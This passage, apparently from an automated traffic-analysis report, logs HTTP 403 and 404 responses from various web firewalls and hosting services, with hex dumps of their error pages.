09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"><htm
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:45 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=sYOVvZn9GgJSsXAbRTd7lx1GuPA4YVeZC6d3T16GAAGhHEyt00SfZsl33jxwY0IjUZOf3eDx1JWVOmuqGlEm1qtNI5eGsqehTbMwAXvt4%2F2q%2BJ%2BzWdHEuaF0OkI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6df488639036-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 05 Jul 2023 06:07:45 GMTserver: Apachecontent-length: 199content-type: text/html; charset=iso-8859-1x-server: coxkitch-svrData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 05 Jul 2023 06:07:45 GMTContent-Type: text/htmlContent-Length: 125Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:46 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BTEzAEqAzcbNNzQ4OGI2ZTRlNjIxNzBmNTVmYjNhZmUwYTJhMTFh;Path=/X-Contextid: yVFNZvim/iA8lxlyyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveServer: ZENEDGEX-Cache-Status: Cache-Control: no-storeCache-Control: no-cache, no-store, must-revalidateCache-Control: max-age=0Date: Wed, 05 Jul 2023 06:07:46 GMTX-Zen-Fury: a424fc948cd41ededa37409f6d3decbe3cf1deccData Raw: 32 61 61 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 20 69 66 20 28 74 79 70 65 6f 66 28 5f 5f 5f 7a 65 6e 29 20 3d 3d 3d 20 22 75 6e 64 65 66 69 6e 65 64 22 29 20 7b 73 65 74 54 69 6d 65 6f 75 74 28 61 72 67 75 6d 65 6e 74 73 2e 63 61 6c 6c 65 65 2c 20 35 30 29 3b 20 72 65 74 75 72 6e 3b 20 7d 5f 5f 5f 7a 65 6e 2e 68 69 63 28 22 5f 5f 5a 45 48 49 43 36 31 38 33 22 2c 20 31 36 38 38 35 33 37 32 31 39 2c 20 31 2c 20 30 2c 20 36 30 29 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 68 69 63 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 64 69 76 3e 3c 68 31 3e 34 30 33 3c 2f 68 31 3e 3c 2f 64 69 76 3e 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 20 73 72 63 3d 22 2f 5f 5f 7a 65 6e 65 64 67 65 2f 61 73 73 65 74 73 2f 66 2e 6a 73 3f 76 3d 31 36 37 34 32 30 37 34 32 32 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 76 61 72 20 76 20 3d 20 31 36 38 38 35 33 37 31 35 38 20 2a 20 33 2e 31 34 31 35 39 32 36 35 33 35 38 39 38 3b 20 76 20 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 76 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 5f 5f 7a 6a 63 37 31 33 39 3d 22 2b 76 2b 22 3b 20 65 78 70 69 72 65 73 3d 57 65 64 2c 20 30 35 20 4a 75 6c 20 32 30 32 33 20 30 36 3a 30 39 3a 34 36 20 55 54 43 3b 20 70 61 74 68 3d 2f 22 3b 20 7d 29 28 29 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 2aa<html><head><title>403 Forbidden</title><script type="text/javascript">(function(){ if (typeof(___zen) === "undefined") {setTimeout(arguments.callee, 50); return; }___zen.hic("__ZEHIC6183", 1688537219, 1, 0, 60); })()</script><script type="text/javascript" async="async" src="/__zenedge/assets/hic.js?v=1674207422"></script></head><body><center><div><h1>403</h1></div><h1>Forbidden</h1></center><script type="text/javascript" async="async" src="/__zenedge/assets/f.js?v=1674207422"></script><script>(function () { var v = 1688537158 * 3.1415926535898; v = Math.floor(v); do
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:46 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 05 Jul 2023 06:08:01 GMTX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6Kp0bsBc6U6OmNi44qpeJI6kDsU2C5OjiZdENOKpic7%2FMmBI%2B%2FvkHGYgl5UJalTjao2NDbvTlkuU2fvWcEsZbk2l%2FNP4%2FJVMoQGmUWCHLWoaQCJ6p5t0r8bHvavr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7e1d6dfa38b21994-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 39 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d Data Ascii: 119e<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="C
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenAge: 0Cache-Control: no-cacheContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 05 Jul 2023 06:07:46 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceSet-Cookie: crumb=BcvwVR8Jp9rcNjkxNDAwZjg3ZDYzNDZhMDU0OTgxMzI5Njc2MjU0;Path=/X-Contextid: g9lRjPjD/z1BuHX3wData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 05 Jul 2023 06:07:46 GMTServer: Apache/2.4Content-Length: 318Keep-Alive: timeout=5, max=300Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><p>Additionally, a 403 Forbiddenerror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 171X-Sorting-Hat-ShopId: 61843439788Server-Timing: processing;dur=19X-Shopify-Stage: productionX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 7792507e-458d-4aa7-af13-aeca3d19643fCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=_V54ksTHRMn1PBcWZu7_3TE9kVCZXjqWpkbSORSb2bA-1688537266-0-AX8XI8dGDidw06KQWUX0Nnk/Frq6oijjxofSjho0PrwAVimizUEHZDf5FQe32AJJwQE3syGLi5PQqGcFGRIW8OY=; path=/; expires=Wed, 05-Jul-23 06:37:46 GMT; domain=.www.snugpak.com; HttpOnly; SameSite=NoneReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=931LAdgDxk4KTln5%2BDsK2DcgJHOdXxMtkb6tKoEtH0qvvEV2y3TdAlrbpXi5rnq%2BvJz2hXXFwzlfZ4uMv8lhm8WIcd%2B1t3i%2FJThjB8utLKXjDGWWT1xmm4tlwx0%2F887YMg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=144.999981Server: cloudflareCF-RAY: 7e1d6dfb8bd7906a-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 05 Jul 2023 06:07:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 0Connection: keep-aliveX-Sorting-Hat-PodId: 216X-Sorting-Hat-ShopId: 66042101977Server-Timing: processing;dur=22X-Shopify-Stage: canaryX-Content-Type-Options: nosniffX-Download-Options: noopenX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Dc: gcp-europe-west3,gcp-us-central1,gcp-us-central1X-Request-ID: 06d45411-b58a-43d6-9ee3-c00cfa01d997CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qnhQIYwEfxz19vcsDd0BHUTg%2F%2FOHgABY83%2FWLjkaA9AFSFGCJW%2BQXFu3LiWp0vXhxXECcBDrb6xliqsVSOjcoSN5ba1dkR5lw2EoH9%2FzAfOWWDXYMTxVfKY8SqPEs8g%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}Server-Timing: cfRequestDuration;dur=152.999878Server: cloudflareCF-RAY: 7e1d6dfbeebe9b4c-FRAalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: Sucuri/CloudproxyDate: Wed, 05 Jul 2023 06:07:46 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveX-Sucuri-ID: 15003X-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffX-Sucuri-Block: FBP006Data Raw: 33 30 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 73 75 63 75 72 69 2e 6e 65 74 2f 73 75 63 75 72 69 2d 66 69 72 65 77 61 6c 6c 2d 62 6c 6f 63 6b 2e 63 73 73 22 20 2f 3e 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 53 75 63 75 72 69 20 57 65 62 53 69 74 65 20 46 69 72 65 77 61 6c 6c 20 2d 20 41 63 63 65 73 73 20 44 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 2c 36 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 6d 61 69 6e 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 61 70 70 2d 68 65 61 64 65 72 20 63 6c 65 61 72 66 69 78 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 66 69 72 65 77 61 6c 6c 5f 62 6c 6f 63 6b 22 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 3c 2f 61 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 2d 6e 65 61 72 74 65 78 74 22 3e 57 65 62 73 69 74 65 20 46 69 72 65 77 61 6c 6c 3c 2f 73 70 61 6e 3e 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 75 63 75 72 69 2e 6e 65 74 2f 3f 75 74 6d 5f 73 6f 75 72 